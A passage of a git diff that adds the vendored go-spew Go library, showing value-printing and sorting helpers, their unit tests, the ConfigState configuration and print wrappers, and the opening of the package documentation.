+ w.Write(trueBytes)
+ } else {
+ w.Write(falseBytes)
+ }
+}
+
+// printInt outputs a signed integer value to Writer w.
+func printInt(w io.Writer, val int64, base int) {
+ w.Write([]byte(strconv.FormatInt(val, base)))
+}
+
+// printUint outputs an unsigned integer value to Writer w.
+func printUint(w io.Writer, val uint64, base int) {
+ w.Write([]byte(strconv.FormatUint(val, base)))
+}
+
+// printFloat outputs a floating point value using the specified precision,
+// which is expected to be 32 or 64bit, to Writer w.
+func printFloat(w io.Writer, val float64, precision int) {
+ w.Write([]byte(strconv.FormatFloat(val, 'g', -1, precision)))
+}
+
+// printComplex outputs a complex value using the specified float precision
+// for the real and imaginary parts to Writer w.
+func printComplex(w io.Writer, c complex128, floatPrecision int) {
+ r := real(c)
+ w.Write(openParenBytes)
+ w.Write([]byte(strconv.FormatFloat(r, 'g', -1, floatPrecision)))
+ i := imag(c)
+ if i >= 0 {
+ w.Write(plusBytes)
+ }
+ w.Write([]byte(strconv.FormatFloat(i, 'g', -1, floatPrecision)))
+ w.Write(iBytes)
+ w.Write(closeParenBytes)
+}
+
+// printHexPtr outputs a uintptr formatted as hexidecimal with a leading '0x'
+// prefix to Writer w.
+func printHexPtr(w io.Writer, p uintptr) {
+ // Null pointer.
+ num := uint64(p)
+ if num == 0 {
+ w.Write(nilAngleBytes)
+ return
+ }
+
+ // Max uint64 is 16 bytes in hex + 2 bytes for '0x' prefix
+ buf := make([]byte, 18)
+
+ // It's simpler to construct the hex string right to left.
+ base := uint64(16)
+ i := len(buf) - 1
+ for num >= base {
+ buf[i] = hexDigits[num%base]
+ num /= base
+ i--
+ }
+ buf[i] = hexDigits[num]
+
+ // Add '0x' prefix.
+ i--
+ buf[i] = 'x'
+ i--
+ buf[i] = '0'
+
+ // Strip unused leading bytes.
+ buf = buf[i:]
+ w.Write(buf)
+}
+
+// valuesSorter implements sort.Interface to allow a slice of reflect.Value
+// elements to be sorted.
+type valuesSorter struct {
+ values []reflect.Value
+ strings []string // either nil or same len and values
+ cs *ConfigState
+}
+
+// newValuesSorter initializes a valuesSorter instance, which holds a set of
+// surrogate keys on which the data should be sorted. It uses flags in
+// ConfigState to decide if and how to populate those surrogate keys.
+func newValuesSorter(values []reflect.Value, cs *ConfigState) sort.Interface {
+ vs := &valuesSorter{values: values, cs: cs}
+ if canSortSimply(vs.values[0].Kind()) {
+ return vs
+ }
+ if !cs.DisableMethods {
+ vs.strings = make([]string, len(values))
+ for i := range vs.values {
+ b := bytes.Buffer{}
+ if !handleMethods(cs, &b, vs.values[i]) {
+ vs.strings = nil
+ break
+ }
+ vs.strings[i] = b.String()
+ }
+ }
+ if vs.strings == nil && cs.SpewKeys {
+ vs.strings = make([]string, len(values))
+ for i := range vs.values {
+ vs.strings[i] = Sprintf("%#v", vs.values[i].Interface())
+ }
+ }
+ return vs
+}
+
+// canSortSimply tests whether a reflect.Kind is a primitive that can be sorted
+// directly, or whether it should be considered for sorting by surrogate keys
+// (if the ConfigState allows it).
+func canSortSimply(kind reflect.Kind) bool {
+ // This switch parallels valueSortLess, except for the default case.
+ switch kind {
+ case reflect.Bool:
+ return true
+ case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+ return true
+ case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint:
+ return true
+ case reflect.Float32, reflect.Float64:
+ return true
+ case reflect.String:
+ return true
+ case reflect.Uintptr:
+ return true
+ case reflect.Array:
+ return true
+ }
+ return false
+}
+
+// Len returns the number of values in the slice. It is part of the
+// sort.Interface implementation.
+func (s *valuesSorter) Len() int {
+ return len(s.values)
+}
+
+// Swap swaps the values at the passed indices. It is part of the
+// sort.Interface implementation.
+func (s *valuesSorter) Swap(i, j int) {
+ s.values[i], s.values[j] = s.values[j], s.values[i]
+ if s.strings != nil {
+ s.strings[i], s.strings[j] = s.strings[j], s.strings[i]
+ }
+}
+
+// valueSortLess returns whether the first value should sort before the second
+// value. It is used by valueSorter.Less as part of the sort.Interface
+// implementation.
+func valueSortLess(a, b reflect.Value) bool {
+ switch a.Kind() {
+ case reflect.Bool:
+ return !a.Bool() && b.Bool()
+ case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+ return a.Int() < b.Int()
+ case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint:
+ return a.Uint() < b.Uint()
+ case reflect.Float32, reflect.Float64:
+ return a.Float() < b.Float()
+ case reflect.String:
+ return a.String() < b.String()
+ case reflect.Uintptr:
+ return a.Uint() < b.Uint()
+ case reflect.Array:
+ // Compare the contents of both arrays.
+ l := a.Len()
+ for i := 0; i < l; i++ {
+ av := a.Index(i)
+ bv := b.Index(i)
+ if av.Interface() == bv.Interface() {
+ continue
+ }
+ return valueSortLess(av, bv)
+ }
+ }
+ return a.String() < b.String()
+}
+
+// Less returns whether the value at index i should sort before the
+// value at index j. It is part of the sort.Interface implementation.
+func (s *valuesSorter) Less(i, j int) bool {
+ if s.strings == nil {
+ return valueSortLess(s.values[i], s.values[j])
+ }
+ return s.strings[i] < s.strings[j]
+}
+
+// sortValues is a sort function that handles both native types and any type that
+// can be converted to error or Stringer. Other inputs are sorted according to
+// their Value.String() value to ensure display stability.
+func sortValues(values []reflect.Value, cs *ConfigState) {
+ if len(values) == 0 {
+ return
+ }
+ sort.Sort(newValuesSorter(values, cs))
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/common_test.go b/vendor/github.com/davecgh/go-spew/spew/common_test.go
new file mode 100644
index 0000000000..0f5ce47dca
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/common_test.go
@@ -0,0 +1,298 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew_test
+
+import (
+ "fmt"
+ "reflect"
+ "testing"
+
+ "github.com/davecgh/go-spew/spew"
+)
+
+// custom type to test Stinger interface on non-pointer receiver.
+type stringer string
+
+// String implements the Stringer interface for testing invocation of custom
+// stringers on types with non-pointer receivers.
+func (s stringer) String() string {
+ return "stringer " + string(s)
+}
+
+// custom type to test Stinger interface on pointer receiver.
+type pstringer string
+
+// String implements the Stringer interface for testing invocation of custom
+// stringers on types with only pointer receivers.
+func (s *pstringer) String() string {
+ return "stringer " + string(*s)
+}
+
+// xref1 and xref2 are cross referencing structs for testing circular reference
+// detection.
+type xref1 struct {
+ ps2 *xref2
+}
+type xref2 struct {
+ ps1 *xref1
+}
+
+// indirCir1, indirCir2, and indirCir3 are used to generate an indirect circular
+// reference for testing detection.
+type indirCir1 struct {
+ ps2 *indirCir2
+}
+type indirCir2 struct {
+ ps3 *indirCir3
+}
+type indirCir3 struct {
+ ps1 *indirCir1
+}
+
+// embed is used to test embedded structures.
+type embed struct {
+ a string
+}
+
+// embedwrap is used to test embedded structures.
+type embedwrap struct {
+ *embed
+ e *embed
+}
+
+// panicer is used to intentionally cause a panic for testing spew properly
+// handles them
+type panicer int
+
+func (p panicer) String() string {
+ panic("test panic")
+}
+
+// customError is used to test custom error interface invocation.
+type customError int
+
+func (e customError) Error() string {
+ return fmt.Sprintf("error: %d", int(e))
+}
+
+// stringizeWants converts a slice of wanted test output into a format suitable
+// for a test error message.
+func stringizeWants(wants []string) string {
+ s := ""
+ for i, want := range wants {
+ if i > 0 {
+ s += fmt.Sprintf("want%d: %s", i+1, want)
+ } else {
+ s += "want: " + want
+ }
+ }
+ return s
+}
+
+// testFailed returns whether or not a test failed by checking if the result
+// of the test is in the slice of wanted strings.
+func testFailed(result string, wants []string) bool {
+ for _, want := range wants {
+ if result == want {
+ return false
+ }
+ }
+ return true
+}
+
+type sortableStruct struct {
+ x int
+}
+
+func (ss sortableStruct) String() string {
+ return fmt.Sprintf("ss.%d", ss.x)
+}
+
+type unsortableStruct struct {
+ x int
+}
+
+type sortTestCase struct {
+ input []reflect.Value
+ expected []reflect.Value
+}
+
+func helpTestSortValues(tests []sortTestCase, cs *spew.ConfigState, t *testing.T) {
+ getInterfaces := func(values []reflect.Value) []interface{} {
+ interfaces := []interface{}{}
+ for _, v := range values {
+ interfaces = append(interfaces, v.Interface())
+ }
+ return interfaces
+ }
+
+ for _, test := range tests {
+ spew.SortValues(test.input, cs)
+ // reflect.DeepEqual cannot really make sense of reflect.Value,
+ // probably because of all the pointer tricks. For instance,
+ // v(2.0) != v(2.0) on a 32-bits system. Turn them into interface{}
+ // instead.
+ input := getInterfaces(test.input)
+ expected := getInterfaces(test.expected)
+ if !reflect.DeepEqual(input, expected) {
+ t.Errorf("Sort mismatch:\n %v != %v", input, expected)
+ }
+ }
+}
+
+// TestSortValues ensures the sort functionality for relect.Value based sorting
+// works as intended.
+func TestSortValues(t *testing.T) {
+ v := reflect.ValueOf
+
+ a := v("a")
+ b := v("b")
+ c := v("c")
+ embedA := v(embed{"a"})
+ embedB := v(embed{"b"})
+ embedC := v(embed{"c"})
+ tests := []sortTestCase{
+ // No values.
+ {
+ []reflect.Value{},
+ []reflect.Value{},
+ },
+ // Bools.
+ {
+ []reflect.Value{v(false), v(true), v(false)},
+ []reflect.Value{v(false), v(false), v(true)},
+ },
+ // Ints.
+ {
+ []reflect.Value{v(2), v(1), v(3)},
+ []reflect.Value{v(1), v(2), v(3)},
+ },
+ // Uints.
+ {
+ []reflect.Value{v(uint8(2)), v(uint8(1)), v(uint8(3))},
+ []reflect.Value{v(uint8(1)), v(uint8(2)), v(uint8(3))},
+ },
+ // Floats.
+ {
+ []reflect.Value{v(2.0), v(1.0), v(3.0)},
+ []reflect.Value{v(1.0), v(2.0), v(3.0)},
+ },
+ // Strings.
+ {
+ []reflect.Value{b, a, c},
+ []reflect.Value{a, b, c},
+ },
+ // Array
+ {
+ []reflect.Value{v([3]int{3, 2, 1}), v([3]int{1, 3, 2}), v([3]int{1, 2, 3})},
+ []reflect.Value{v([3]int{1, 2, 3}), v([3]int{1, 3, 2}), v([3]int{3, 2, 1})},
+ },
+ // Uintptrs.
+ {
+ []reflect.Value{v(uintptr(2)), v(uintptr(1)), v(uintptr(3))},
+ []reflect.Value{v(uintptr(1)), v(uintptr(2)), v(uintptr(3))},
+ },
+ // SortableStructs.
+ {
+ // Note: not sorted - DisableMethods is set.
+ []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})},
+ []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})},
+ },
+ // UnsortableStructs.
+ {
+ // Note: not sorted - SpewKeys is false.
+ []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+ []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+ },
+ // Invalid.
+ {
+ []reflect.Value{embedB, embedA, embedC},
+ []reflect.Value{embedB, embedA, embedC},
+ },
+ }
+ cs := spew.ConfigState{DisableMethods: true, SpewKeys: false}
+ helpTestSortValues(tests, &cs, t)
+}
+
+// TestSortValuesWithMethods ensures the sort functionality for relect.Value
+// based sorting works as intended when using string methods.
+func TestSortValuesWithMethods(t *testing.T) {
+ v := reflect.ValueOf
+
+ a := v("a")
+ b := v("b")
+ c := v("c")
+ tests := []sortTestCase{
+ // Ints.
+ {
+ []reflect.Value{v(2), v(1), v(3)},
+ []reflect.Value{v(1), v(2), v(3)},
+ },
+ // Strings.
+ {
+ []reflect.Value{b, a, c},
+ []reflect.Value{a, b, c},
+ },
+ // SortableStructs.
+ {
+ []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})},
+ []reflect.Value{v(sortableStruct{1}), v(sortableStruct{2}), v(sortableStruct{3})},
+ },
+ // UnsortableStructs.
+ {
+ // Note: not sorted - SpewKeys is false.
+ []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+ []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+ },
+ }
+ cs := spew.ConfigState{DisableMethods: false, SpewKeys: false}
+ helpTestSortValues(tests, &cs, t)
+}
+
+// TestSortValuesWithSpew ensures the sort functionality for relect.Value
+// based sorting works as intended when using spew to stringify keys.
+func TestSortValuesWithSpew(t *testing.T) {
+ v := reflect.ValueOf
+
+ a := v("a")
+ b := v("b")
+ c := v("c")
+ tests := []sortTestCase{
+ // Ints.
+ {
+ []reflect.Value{v(2), v(1), v(3)},
+ []reflect.Value{v(1), v(2), v(3)},
+ },
+ // Strings.
+ {
+ []reflect.Value{b, a, c},
+ []reflect.Value{a, b, c},
+ },
+ // SortableStructs.
+ {
+ []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})},
+ []reflect.Value{v(sortableStruct{1}), v(sortableStruct{2}), v(sortableStruct{3})},
+ },
+ // UnsortableStructs.
+ {
+ []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+ []reflect.Value{v(unsortableStruct{1}), v(unsortableStruct{2}), v(unsortableStruct{3})},
+ },
+ }
+ cs := spew.ConfigState{DisableMethods: true, SpewKeys: true}
+ helpTestSortValues(tests, &cs, t)
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/config.go b/vendor/github.com/davecgh/go-spew/spew/config.go
new file mode 100644
index 0000000000..2e3d22f312
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/config.go
@@ -0,0 +1,306 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew
+
+import (
+ "bytes"
+ "fmt"
+ "io"
+ "os"
+)
+
+// ConfigState houses the configuration options used by spew to format and
+// display values. There is a global instance, Config, that is used to control
+// all top-level Formatter and Dump functionality. Each ConfigState instance
+// provides methods equivalent to the top-level functions.
+//
+// The zero value for ConfigState provides no indentation. You would typically
+// want to set it to a space or a tab.
+//
+// Alternatively, you can use NewDefaultConfig to get a ConfigState instance
+// with default settings. See the documentation of NewDefaultConfig for default
+// values.
+type ConfigState struct {
+ // Indent specifies the string to use for each indentation level. The
+ // global config instance that all top-level functions use set this to a
+ // single space by default. If you would like more indentation, you might
+ // set this to a tab with "\t" or perhaps two spaces with " ".
+ Indent string
+
+ // MaxDepth controls the maximum number of levels to descend into nested
+ // data structures. The default, 0, means there is no limit.
+ //
+ // NOTE: Circular data structures are properly detected, so it is not
+ // necessary to set this value unless you specifically want to limit deeply
+ // nested data structures.
+ MaxDepth int
+
+ // DisableMethods specifies whether or not error and Stringer interfaces are
+ // invoked for types that implement them.
+ DisableMethods bool
+
+ // DisablePointerMethods specifies whether or not to check for and invoke
+ // error and Stringer interfaces on types which only accept a pointer
+ // receiver when the current type is not a pointer.
+ //
+ // NOTE: This might be an unsafe action since calling one of these methods
+ // with a pointer receiver could technically mutate the value, however,
+ // in practice, types which choose to satisify an error or Stringer
+ // interface with a pointer receiver should not be mutating their state
+ // inside these interface methods. As a result, this option relies on
+ // access to the unsafe package, so it will not have any effect when
+ // running in environments without access to the unsafe package such as
+ // Google App Engine or with the "safe" build tag specified.
+ DisablePointerMethods bool
+
+ // DisablePointerAddresses specifies whether to disable the printing of
+ // pointer addresses. This is useful when diffing data structures in tests.
+ DisablePointerAddresses bool
+
+ // DisableCapacities specifies whether to disable the printing of capacities
+ // for arrays, slices, maps and channels. This is useful when diffing
+ // data structures in tests.
+ DisableCapacities bool
+
+ // ContinueOnMethod specifies whether or not recursion should continue once
+ // a custom error or Stringer interface is invoked. The default, false,
+ // means it will print the results of invoking the custom error or Stringer
+ // interface and return immediately instead of continuing to recurse into
+ // the internals of the data type.
+ //
+ // NOTE: This flag does not have any effect if method invocation is disabled
+ // via the DisableMethods or DisablePointerMethods options.
+ ContinueOnMethod bool
+
+ // SortKeys specifies map keys should be sorted before being printed. Use
+ // this to have a more deterministic, diffable output. Note that only
+ // native types (bool, int, uint, floats, uintptr and string) and types
+ // that support the error or Stringer interfaces (if methods are
+ // enabled) are supported, with other types sorted according to the
+ // reflect.Value.String() output which guarantees display stability.
+ SortKeys bool
+
+ // SpewKeys specifies that, as a last resort attempt, map keys should
+ // be spewed to strings and sorted by those strings. This is only
+ // considered if SortKeys is true.
+ SpewKeys bool
+}
+
+// Config is the active configuration of the top-level functions.
+// The configuration can be changed by modifying the contents of spew.Config.
+var Config = ConfigState{Indent: " "}
+
+// Errorf is a wrapper for fmt.Errorf that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the formatted string as a value that satisfies error. See NewFormatter
+// for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Errorf(format, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Errorf(format string, a ...interface{}) (err error) {
+ return fmt.Errorf(format, c.convertArgs(a)...)
+}
+
+// Fprint is a wrapper for fmt.Fprint that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the number of bytes written and any write error encountered. See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Fprint(w, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Fprint(w io.Writer, a ...interface{}) (n int, err error) {
+ return fmt.Fprint(w, c.convertArgs(a)...)
+}
+
+// Fprintf is a wrapper for fmt.Fprintf that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the number of bytes written and any write error encountered. See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Fprintf(w, format, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Fprintf(w io.Writer, format string, a ...interface{}) (n int, err error) {
+ return fmt.Fprintf(w, format, c.convertArgs(a)...)
+}
+
+// Fprintln is a wrapper for fmt.Fprintln that treats each argument as if it
+// passed with a Formatter interface returned by c.NewFormatter. See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Fprintln(w, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Fprintln(w io.Writer, a ...interface{}) (n int, err error) {
+ return fmt.Fprintln(w, c.convertArgs(a)...)
+}
+
+// Print is a wrapper for fmt.Print that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the number of bytes written and any write error encountered. See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Print(c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Print(a ...interface{}) (n int, err error) {
+ return fmt.Print(c.convertArgs(a)...)
+}
+
+// Printf is a wrapper for fmt.Printf that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the number of bytes written and any write error encountered. See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Printf(format, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Printf(format string, a ...interface{}) (n int, err error) {
+ return fmt.Printf(format, c.convertArgs(a)...)
+}
+
+// Println is a wrapper for fmt.Println that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the number of bytes written and any write error encountered. See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Println(c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Println(a ...interface{}) (n int, err error) {
+ return fmt.Println(c.convertArgs(a)...)
+}
+
+// Sprint is a wrapper for fmt.Sprint that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the resulting string. See NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Sprint(c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Sprint(a ...interface{}) string {
+ return fmt.Sprint(c.convertArgs(a)...)
+}
+
+// Sprintf is a wrapper for fmt.Sprintf that treats each argument as if it were
+// passed with a Formatter interface returned by c.NewFormatter. It returns
+// the resulting string. See NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Sprintf(format, c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Sprintf(format string, a ...interface{}) string {
+ return fmt.Sprintf(format, c.convertArgs(a)...)
+}
+
+// Sprintln is a wrapper for fmt.Sprintln that treats each argument as if it
+// were passed with a Formatter interface returned by c.NewFormatter. It
+// returns the resulting string. See NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+// fmt.Sprintln(c.NewFormatter(a), c.NewFormatter(b))
+func (c *ConfigState) Sprintln(a ...interface{}) string {
+ return fmt.Sprintln(c.convertArgs(a)...)
+}
+
+/*
+NewFormatter returns a custom formatter that satisfies the fmt.Formatter
+interface. As a result, it integrates cleanly with standard fmt package
+printing functions. The formatter is useful for inline printing of smaller data
+types similar to the standard %v format specifier.
+
+The custom formatter only responds to the %v (most compact), %+v (adds pointer
+addresses), %#v (adds types), and %#+v (adds types and pointer addresses) verb
+combinations. Any other verbs such as %x and %q will be sent to the the
+standard fmt package for formatting. In addition, the custom formatter ignores
+the width and precision arguments (however they will still work on the format
+specifiers not handled by the custom formatter).
+
+Typically this function shouldn't be called directly. It is much easier to make
+use of the custom formatter by calling one of the convenience functions such as
+c.Printf, c.Println, or c.Printf.
+*/
+func (c *ConfigState) NewFormatter(v interface{}) fmt.Formatter {
+ return newFormatter(c, v)
+}
+
+// Fdump formats and displays the passed arguments to io.Writer w. It formats
+// exactly the same as Dump.
+func (c *ConfigState) Fdump(w io.Writer, a ...interface{}) {
+ fdump(c, w, a...)
+}
+
+/*
+Dump displays the passed parameters to standard out with newlines, customizable
+indentation, and additional debug information such as complete types and all
+pointer addresses used to indirect to the final value. It provides the
+following features over the built-in printing facilities provided by the fmt
+package:
+
+ * Pointers are dereferenced and followed
+ * Circular data structures are detected and handled properly
+ * Custom Stringer/error interfaces are optionally invoked, including
+ on unexported types
+ * Custom types which only implement the Stringer/error interfaces via
+ a pointer receiver are optionally invoked when passing non-pointer
+ variables
+ * Byte arrays and slices are dumped like the hexdump -C command which
+ includes offsets, byte values in hex, and ASCII output
+
+The configuration options are controlled by modifying the public members
+of c. See ConfigState for options documentation.
+
+See Fdump if you would prefer dumping to an arbitrary io.Writer or Sdump to
+get the formatted result as a string.
+*/
+func (c *ConfigState) Dump(a ...interface{}) {
+ fdump(c, os.Stdout, a...)
+}
+
+// Sdump returns a string with the passed arguments formatted exactly the same
+// as Dump.
+func (c *ConfigState) Sdump(a ...interface{}) string {
+ var buf bytes.Buffer
+ fdump(c, &buf, a...)
+ return buf.String()
+}
+
+// convertArgs accepts a slice of arguments and returns a slice of the same
+// length with each argument converted to a spew Formatter interface using
+// the ConfigState associated with s.
+func (c *ConfigState) convertArgs(args []interface{}) (formatters []interface{}) {
+ formatters = make([]interface{}, len(args))
+ for index, arg := range args {
+ formatters[index] = newFormatter(c, arg)
+ }
+ return formatters
+}
+
+// NewDefaultConfig returns a ConfigState with the following default settings.
+//
+// Indent: " "
+// MaxDepth: 0
+// DisableMethods: false
+// DisablePointerMethods: false
+// ContinueOnMethod: false
+// SortKeys: false
+func NewDefaultConfig() *ConfigState {
+ return &ConfigState{Indent: " "}
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/doc.go b/vendor/github.com/davecgh/go-spew/spew/doc.go
new file mode 100644
index 0000000000..aacaac6f1e
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/doc.go
@@ -0,0 +1,211 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+/*
+Package spew implements a deep pretty printer for Go data structures to aid in
+debugging.
+
+A quick overview of the additional features spew provides over the built-in
+printing facilities for Go data types are as follows:
+
+ * Pointers are dereferenced and followed
+ * Circular data structures are detected and handled properly
+ * Custom Stringer/error interfaces are optionally invoked, including
+ on unexported types
+ * Custom types which only implement the Stringer/error interfaces via
+ a pointer receiver are optionally invoked when passing non-pointer
+ variables
+ * Byte arrays and slices are dumped like the hexdump -C command which
+ includes offsets, byte values in hex, and ASCII output (only when using
+ Dump style)
+
+There are two different approaches spew allows for dumping Go data structures:
+
+ * Dump style which prints with newlines, customizable indentation,
+ and additional debug information such as types and all pointer addresses
+ used to indirect to the final value
+ * A custom Formatter interface that integrates cleanly with the standard fmt
+ package and replaces %v, %+v, %#v, and %#+v to provide inline printing
+ similar to the default %v while providing the additional functionality
+ outlined above and passing unsupported format verbs such as %x and %q
+ along to fmt
+
+Quick Start
+
+This section demonstrates how to quickly get started with spew. See the
+sections below for further details on formatting and configuration options.
+
+To dump a variable with full newlines, indentation, type, and pointer
+information use Dump, Fdump, or Sdump:
+ spew.Dump(myVar1, myVar2, ...)
+ spew.Fdump(someWriter, myVar1, myVar2, ...)
+ str := spew.Sdump(myVar1, myVar2, ...)
+
+Alternatively, if you would prefer to use format strings with a compacted inline
+printing style, use the convenience wrappers Printf, Fprintf, etc with
+%v (most compact), %+v (adds pointer addresses), %#v (adds types), or
+%#+v (adds types and pointer addresses):
+ spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+ spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+ spew.Fprintf(someWriter, "myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+ spew.Fprintf(someWriter, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+
+Configuration Options
+
+Configuration of spew is handled by fields in the ConfigState type. For
+convenience, all of the top-level functions use a global state available
+via the spew.Config global.
+
+It is also possible to create a ConfigState instance that provides methods
+equivalent to the top-level functions. This allows concurrent configuration
+options. See the ConfigState documentation for more details.
+
+The following configuration options are available:
+ * Indent
+ String to use for each indentation level for Dump functions.
+ It is a single space by default. A popular alternative is "\t".
+
+ * MaxDepth
+ Maximum number of levels to descend into nested data structures.
+ There is no limit by default.
+
+ * DisableMethods
+ Disables invocation of error and Stringer interface methods.
+ Method invocation is enabled by default.
+
+ * DisablePointerMethods
+ Disables invocation of error and Stringer interface methods on types
+ which only accept pointer receivers from non-pointer variables.
+ Pointer method invocation is enabled by default.
+
+ * DisablePointerAddresses
+ DisablePointerAddresses specifies whether to disable the printing of
+ pointer addresses. This is useful when diffing data structures in tests.
+
+ * DisableCapacities
+ DisableCapacities specifies whether to disable the printing of
+ capacities for arrays, slices, maps and channels. This is useful when
+ diffing data structures in tests.
+
+ * ContinueOnMethod
+ Enables recursion into types after invoking error and Stringer interface
+ methods. Recursion after method invocation is disabled by default.
+
+ * SortKeys
+ Specifies map keys should be sorted before being printed. Use
+ this to have a more deterministic, diffable output. Note that
+ only native types (bool, int, uint, floats, uintptr and string)
+ and types which implement error or Stringer interfaces are
+ supported with other types sorted according to the
+ reflect.Value.String() output which guarantees display
+ stability. Natural map order is used by default.
+
+ * SpewKeys
+ Specifies that, as a last resort attempt, map keys should be
+ spewed to strings and sorted by those strings. This is only
+ considered if SortKeys is true.
+
+Dump Usage
+
+Simply call spew.Dump with a list of variables you want to dump:
+
+ spew.Dump(myVar1, myVar2, ...)
+
+You may also call spew.Fdump if you would prefer to output to an arbitrary
+io.Writer. For example, to dump to standard error:
+
+ spew.Fdump(os.Stderr, myVar1, myVar2, ...)
+
+A third option is to call spew.Sdump to get the formatted output as a string:
+
+ str := spew.Sdump(myVar1, myVar2, ...)
+
+Sample Dump Output
+
